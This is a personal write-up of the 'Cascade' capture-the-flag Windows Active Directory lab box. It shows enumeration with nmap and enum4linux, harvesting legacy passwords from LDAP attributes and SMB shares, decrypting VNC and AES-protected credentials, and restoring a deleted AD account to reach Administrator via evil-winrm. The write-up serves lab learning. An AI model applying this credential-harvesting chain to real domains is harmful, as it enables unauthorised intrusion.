This is my write-up for Cascade box, which was a windows box. I had some difficulties with this since I am not that good with windows but I learned new things. Let’s dive into it.
First of all I scan for available ports using the following nmap command.
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-01 15:35:14Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
We have few services which are relatable to active directory such as kerberos, ldap, smb. First I will use enum4linux to get possible username and group, which information accessible from ldap.
Users: Group 'Domain Users' (RID: 513) has member: CASCADE\administrator Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson Group 'Domain Users' (RID: 513) has member: CASCADE\util Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft
I have a list of usernames and a list of groups. I will try with each one of these username to do a null authentication on smb port 445. But that was not the case. At this point I install and open a gui tool called jxplorer. With this tool I can inspect ldap easily. I enter the host ip and then try to find juicy info on users attributes.
User r.thompson has a attribute named CascadeLegacyPwd, and I can tell it is base64 because I see a =. I get the password for that user.
1 2
echo -n "clk0bjVldmE=" | base64 -d rY4n5eva
Let’s use smbclient with the username and password we have, to test if we can login to smb …..
1 2 3 4 5 6 7 8 9 10 11 12 13 14
smbclient -L //10.10.10.182 -U r.thompson Enter WORKGROUP\r.thompson's password: rY4n5eva
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Audit$ Disk C$ Disk Default share Data Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
I try to access Audit$ but I don’t have permission to do, and then I try Data:
kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient //10.10.10.182/Audit$ -U r.thompson Enter WORKGROUP\r.thompson's password: Try "help" to get a list of possible commands. smb: \> ls NT_STATUS_ACCESS_DENIED listing \* smb: \> exit kali@kali:~/Desktop/Boxes/Cascade/Nmap$ smbclient //10.10.10.182/Data -U r.thompson Enter WORKGROUP\r.thompson's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jan 26 22:27:34 2020 .. D 0 Sun Jan 26 22:27:34 2020 Contractors D 0 Sun Jan 12 20:45:11 2020 Finance D 0 Sun Jan 12 20:45:06 2020 IT D 0 Tue Jan 28 13:04:51 2020 Production D 0 Sun Jan 12 20:45:18 2020 Temps D 0 Sun Jan 12 20:45:15 2020
13106687 blocks of size 4096. 7797938 blocks available smb: \>
I was able to get these files from the share.
1 2 3
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ ls ArkAdRecycleBin.log dcdiag.log Meeting_Notes_June_2018.html 'VNC Install.reg' kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$
The file ArkAdRecycleBin.log contains logs from a program called Ark Ad recycle bin. If you look closely you can see 2 objects get deleted. And the command is running as user ArkSvc. Maybe we can restore these objects?
The file dcdiag.log has inside:
Which as the header says is something related to Server diagnosis. But there was nothing I could take as good info from this file.
The other file Meeting_Notes_June_2018.html:
From this file I get the following info:
A new server is going live on Wednesday.
They will be using a temporary account, which will be deleted at the end of the 2018. Username is TempAdmin and the password is the same as the normal admin.
If you look at the ArkAdRecycleBin file we can see user TempAdmin get deleted and the date is 8/12/2018 which is the day after wednesday. We keep this in our mind.
The last file we see it VNC Install.reg:
This is extracted from a registry as the file extension says. Also there is Password which is in hex. I try and search more in depth for this and find out a tool which may decode the password for me. I used this tool vncpasswd.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py Cloning into 'vncpasswd.py'... remote: Enumerating objects: 26, done. remote: Counting objects: 100% (26/26), done. remote: Compressing objects: 100% (22/22), done. remote: Total 287 (delta 10), reused 13 (delta 4), pack-reused 261 Receiving objects: 100% (287/287), 87.94 KiB | 526.00 KiB/s, done. Resolving deltas: 100% (144/144), done. kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data$ cd vncpasswd.py kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$ ./vncpasswd.py -d -H "6bcf2a4b6e5aca0f" Cannot read from Windows Registry on a Linux system Cannot write to Windows Registry on a Linux system Decrypted Bin Pass= 'sT333ve2' Decrypted Hex Pass= '7354333333766532' kali@kali:~/Desktop/Boxes/Cascade/smbshare/Data/vncpasswd.py$
And get the password sT333ve2 . At this point I nmap again to check if winrm is open.
1 2 3 4 5 6 7 8 9 10 11 12
kali@kali:~$ nmap -Pn -p 5985,5986 10.10.10.182 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 19:27 EDT Nmap scan report for 10.10.10.182 Host is up (0.069s latency).
PORT STATE SERVICE 5985/tcp open wsman 5986/tcp filtered wsmans
Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds kali@kali:~$
I first try with user s.smith(name taken from enum4linux output) as this user was also seen in the Meeting_Notes_June_2018.html file.
I am logged in as s.smith now and I can read the user.txt file also. After poking around the box I can’t seem to find much. So I go back, and try to see if I can access the smb share with the credentials of the new user…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
smbclient //10.10.10.182/Audit$ -U s.smith Enter WORKGROUP\s.smith's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 29 13:01:26 2020 .. D 0 Wed Jan 29 13:01:26 2020 CascAudit.exe A 13312 Tue Jan 28 16:46:51 2020 CascCrypto.dll A 12288 Wed Jan 29 13:00:20 2020 DB D 0 Tue Jan 28 16:40:59 2020 RunAudit.bat A 45 Tue Jan 28 18:29:47 2020 System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019 x64 D 0 Sun Jan 26 17:25:27 2020 x86 D 0 Sun Jan 26 17:25:27 2020
13106687 blocks of size 4096. 7796325 blocks available smb: \>
I can access audit which contains a .exe with a dll which seems to be linked to it A DB folder and some others .ddl files. Inside DB there is a file named Audit.db.
1 2
kali@kali:~/Desktop/Boxes/Cascade/smbshare/$ file Audit.db Audit.db: SQLite 3.x database, last written using SQLite version
I open the file with SQlite database browser. I find inside the Ldap Table a base64 string. I try to decode it bu nothing. This seems to belong to a user named ArkSvc. This user maybe is related to ArkAdRecycleBin as seen on the log.
By looking into the RunAudit.bat I see there is something related to the executable file.
Maybe the password is encrypted by using the exe file we saw earlier. I am going to use AvaloniaILSpy you can also use dotPeek if you feel like switching to a windows box. I open the executable file and try to find the main function. Because this is the function every program starts. In the main program I find some juicy staff. There is some decryption proccess happening on password = Crypto.DecryptString(encryptedString, "c4scadek3y654321"); I also found a string there. Now I am going to load the dll file to see if I found something there also, as the Crypto.DecryptString may be reffering to the dll. I find the decryption Function inside the dll There is also a IV key and the decryption algorithm which seems to be AES in CBC mode.
I now have the following extracted:
Encrypted password: BQO5l5Kj9MdErXx6Q6AGOw==
IV : 1tdyjCbY1Ix49842
Key: c4scadek3y654321
By using this website, I get the decrypted password in base64 encoding.
I now login as the user ArkSvc and password w3lc0meFr31nd with evil-winrm. Now as the file ArkAdRecycleBin.log shows I will try to restore the deleted accounts, because these are on recyclebin right???…
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz which when I base64 decode it gives me the cleartext password: baCT3r1aN00dles
I now use again evil-winrm but this time as user Administrator(Because as seen in the file Meeting_Notes_June_2018.html the TempAdmin has the same password as the admin).
Trying to log in as TempAdmin does not do something as this users is deleted. I restore the object with the command Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects | Restore-ADObject as user administrator and then try to login but I can’t do it. By viewing the in which Groups TempAdmin the user is not inside Remote Management user. By adding the user at that group I can login also as TempAdmin
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user TempAdmin User name TempAdmin Full Name TempAdmin Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set 27/01/2020 04:23:08 Password expires Never Password changeable 27/01/2020 04:23:08 Password required Yes User may change password No
Workstations allowed All Logon script User profile Home directory Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully.